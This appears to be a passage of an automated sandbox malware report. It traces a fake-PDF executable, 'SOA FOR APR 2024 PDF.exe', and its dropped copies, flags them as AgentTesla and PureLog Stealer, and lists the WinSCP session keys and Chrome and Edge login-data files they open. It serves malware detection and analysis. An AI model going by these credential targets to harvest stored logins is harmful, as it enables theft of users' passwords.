                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeQueries volume information: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeQueries volume information: C:\Users\user\AppData\Roaming\eeBIYZL.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeQueries volume information: C:\Users\user\AppData\Roaming\eeBIYZL.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.BjTxJte.exe.4bec170.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.BjTxJte.exe.45fc310.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.BjTxJte.exe.4c27190.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.eeBIYZL.exe.3fe9420.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.BjTxJte.exe.4637330.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.eeBIYZL.exe.3fae400.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.BjTxJte.exe.4bec170.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.BjTxJte.exe.4c27190.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.eeBIYZL.exe.3fe9420.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.BjTxJte.exe.4637330.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.eeBIYZL.exe.3fae400.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.BjTxJte.exe.45fc310.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.3282089409.000000000288C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3273741870.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3282089409.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3283970574.0000000003244000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3282284281.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.3285357778.00000000034FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3283970574.000000000323C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2132450490.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.3285357778.0000000003504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3282284281.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3282284281.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2071533656.00000000048BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3282089409.0000000002894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3283970574.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.3285357778.00000000034D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2229738944.0000000004BEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SOA FOR APR 2024 PDF.exe PID: 1988, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SOA FOR APR 2024 PDF.exe PID: 7384, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: eeBIYZL.exe PID: 7512, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: eeBIYZL.exe PID: 7788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7928, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7176, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7240, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7364, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.5260000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SOA FOR APR 2024 PDF.exe.5260000.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2071533656.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2075260613.0000000005260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
